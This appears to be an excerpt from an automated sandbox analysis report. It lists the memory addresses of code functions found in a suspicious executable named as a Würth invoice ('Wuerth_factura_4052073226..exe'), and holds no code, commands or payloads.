Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4EC0	4_2_3A5F4EC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF2F8	4_2_3A5FF2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD2F7	4_2_3A5FD2F7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F22F0	4_2_3A5F22F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF2E7	4_2_3A5FF2E7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1E98	4_2_3A5F1E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1EA8	4_2_3A5F1EA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2758	4_2_3A5F2758
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2749	4_2_3A5F2749
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF778	4_2_3A5FF778
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5770	4_2_3A5F5770
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7B69	4_2_3A5F7B69
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB318	4_2_3A5FB318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD308	4_2_3A5FD308
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB307	4_2_3A5FB307
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2300	4_2_3A5F2300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5328	4_2_3A5F5328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7722	4_2_3A5F7722
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7720	4_2_3A5F7720
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5BD8	4_2_3A5F5BD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2FF9	4_2_3A5F2FF9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD798	4_2_3A5FD798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB798	4_2_3A5FB798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FF788	4_2_3A5FF788
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FD787	4_2_3A5FD787
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F5780	4_2_3A5F5780
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2BB0	4_2_3A5F2BB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FB7A8	4_2_3A5FB7A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F2BA0	4_2_3A5F2BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F8FA0	4_2_3A5F8FA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F3450	4_2_3A5F3450
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F0040	4_2_3A5F0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6478	4_2_3A5F6478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F3460	4_2_3A5F3460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FDC19	4_2_3A5FDC19
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FFC18	4_2_3A5FFC18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F3008	4_2_3A5F3008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FBC38	4_2_3A5FBC38
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6030	4_2_3A5F6030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FBC29	4_2_3A5FBC29
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FDC28	4_2_3A5FDC28
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6026	4_2_3A5F6026
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC0C8	4_2_3A5FC0C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F08F0	4_2_3A5F08F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F0498	4_2_3A5F0498
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6488	4_2_3A5F6488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE0B8	4_2_3A5FE0B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F38B8	4_2_3A5F38B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC0B7	4_2_3A5FC0B7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE0A7	4_2_3A5FE0A7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC558	4_2_3A5FC558
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE548	4_2_3A5FE548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F0D48	4_2_3A5F0D48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC548	4_2_3A5FC548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FA938	4_2_3A5FA938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE538	4_2_3A5FE538
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FA928	4_2_3A5FA928
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE9D8	4_2_3A5FE9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC9D8	4_2_3A5FC9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FE9C8	4_2_3A5FE9C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F15F8	4_2_3A5F15F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F15E8	4_2_3A5F15E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FC9E8	4_2_3A5FC9E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F119F	4_2_3A5F119F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F11A0	4_2_3A5F11A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666678	4_2_3A666678
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665FD8	4_2_3A665FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669FD8	4_2_3A669FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660960	4_2_3A660960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667E60	4_2_3A667E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D460	4_2_3A66D460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A968	4_2_3A66A968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664468	4_2_3A664468
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D470	4_2_3A66D470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661270	4_2_3A661270
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669171	4_2_3A669171
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E77F	4_2_3A66E77F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664478	4_2_3A664478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662478	4_2_3A662478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66BC78	4_2_3A66BC78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C144	4_2_3A66C144
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660040	4_2_3A660040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666B40	4_2_3A666B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665B48	4_2_3A665B48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669648	4_2_3A669648
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663B49	4_2_3A663B49
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66EC49	4_2_3A66EC49
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C150	4_2_3A66C150
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660950	4_2_3A660950
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667E50	4_2_3A667E50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663B58	4_2_3A663B58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66EC58	4_2_3A66EC58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A958	4_2_3A66A958
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D927	4_2_3A66D927
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F120	4_2_3A66F120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665228	4_2_3A665228
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668328	4_2_3A668328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669637	4_2_3A669637
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66AE30	4_2_3A66AE30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666B30	4_2_3A666B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66663E	4_2_3A66663E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663238	4_2_3A663238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66D938	4_2_3A66D938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665B39	4_2_3A665B39
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660006	4_2_3A660006
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66DE00	4_2_3A66DE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664908	4_2_3A664908
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667008	4_2_3A667008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C608	4_2_3A66C608
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661710	4_2_3A661710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669B10	4_2_3A669B10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F111	4_2_3A66F111
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66AE1F	4_2_3A66AE1F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662918	4_2_3A662918
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66C618	4_2_3A66C618
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668318	4_2_3A668318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665219	4_2_3A665219
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CAE0	4_2_3A66CAE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660DE0	4_2_3A660DE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6687E0	4_2_3A6687E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663FE8	4_2_3A663FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F5E8	4_2_3A66F5E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661FE8	4_2_3A661FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B2E8	4_2_3A66B2E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6648F7	4_2_3A6648F7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A660DF0	4_2_3A660DF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6687F0	4_2_3A6687F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66DDF0	4_2_3A66DDF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6616FF	4_2_3A6616FF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669AFF	4_2_3A669AFF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A666FFB	4_2_3A666FFB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661FF8	4_2_3A661FF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B2F8	4_2_3A66B2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A665FC7	4_2_3A665FC7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B7C0	4_2_3A66B7C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6604C0	4_2_3A6604C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6636C8	4_2_3A6636C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E2C8	4_2_3A66E2C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669FC8	4_2_3A669FC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66F5D7	4_2_3A66F5D7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6604D0	4_2_3A6604D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6674D0	4_2_3A6674D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CAD1	4_2_3A66CAD1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A663FD8	4_2_3A663FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CFA7	4_2_3A66CFA7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661BA0	4_2_3A661BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A4A0	4_2_3A66A4A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66FAA0	4_2_3A66FAA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66B7AF	4_2_3A66B7AF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662DA8	4_2_3A662DA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66CFA8	4_2_3A66CFA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6656A8	4_2_3A6656A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668CA9	4_2_3A668CA9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66FAB0	4_2_3A66FAB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6674BF	4_2_3A6674BF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6656B8	4_2_3A6656B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A668CB8	4_2_3A668CB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E2B8	4_2_3A66E2B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661280	4_2_3A661280
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A669180	4_2_3A669180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66A48F	4_2_3A66A48F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662488	4_2_3A662488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66BC88	4_2_3A66BC88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667988	4_2_3A667988
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664D89	4_2_3A664D89
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A66E790	4_2_3A66E790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A661B91	4_2_3A661B91
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A662D9C	4_2_3A662D9C
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A664D98	4_2_3A664D98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A667998	4_2_3A667998
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6870C0	4_2_3A6870C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A68D710	4_2_3A68D710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684E60	4_2_3A684E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681C60	4_2_3A681C60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686A70	4_2_3A686A70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A68EE48	4_2_3A68EE48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686440	4_2_3A686440
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683240	4_2_3A683240
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680040	4_2_3A680040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684820	4_2_3A684820
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681620	4_2_3A681620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A685E00	4_2_3A685E00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A682C00	4_2_3A682C00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A685AE0	4_2_3A685AE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6828E0	4_2_3A6828E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683EC0	4_2_3A683EC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680CC0	4_2_3A680CC0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6854A0	4_2_3A6854A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6822A0	4_2_3A6822A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683880	4_2_3A683880
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680680	4_2_3A680680
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686A80	4_2_3A686A80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686760	4_2_3A686760
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683560	4_2_3A683560
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680360	4_2_3A680360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684B40	4_2_3A684B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681940	4_2_3A681940
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686750	4_2_3A686750
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686120	4_2_3A686120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A682F20	4_2_3A682F20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A684500	4_2_3A684500
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681300	4_2_3A681300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6841E0	4_2_3A6841E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680FE0	4_2_3A680FE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6857C0	4_2_3A6857C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6825C0	4_2_3A6825C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A680FD0	4_2_3A680FD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A686DA0	4_2_3A686DA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A683BA0	4_2_3A683BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6809A0	4_2_3A6809A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A685180	4_2_3A685180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A681F80	4_2_3A681F80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698470	4_2_3A698470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691CF0	4_2_3A691CF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69FB30	4_2_3A69FB30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69E870	4_2_3A69E870
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B670	4_2_3A69B670
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690040	4_2_3A690040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699A50	4_2_3A699A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69CC50	4_2_3A69CC50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691828	4_2_3A691828
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B030	4_2_3A69B030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69E230	4_2_3A69E230
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690006	4_2_3A690006
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69C610	4_2_3A69C610
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699410	4_2_3A699410
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69F810	4_2_3A69F810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691817	4_2_3A691817
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691CE0	4_2_3A691CE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6904F9	4_2_3A6904F9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69F4F0	4_2_3A69F4F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6990F0	4_2_3A6990F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69C2F0	4_2_3A69C2F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69D8D0	4_2_3A69D8D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A6D0	4_2_3A69A6D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69BCB0	4_2_3A69BCB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698AB0	4_2_3A698AB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69EEB0	4_2_3A69EEB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690E8A	4_2_3A690E8A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690E98	4_2_3A690E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A090	4_2_3A69A090
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69D290	4_2_3A69D290
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691360	4_2_3A691360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A693360	4_2_3A693360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699D70	4_2_3A699D70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69CF70	4_2_3A69CF70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691351	4_2_3A691351
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69E550	4_2_3A69E550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B350	4_2_3A69B350
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69C930	4_2_3A69C930
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699730	4_2_3A699730
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690508	4_2_3A690508
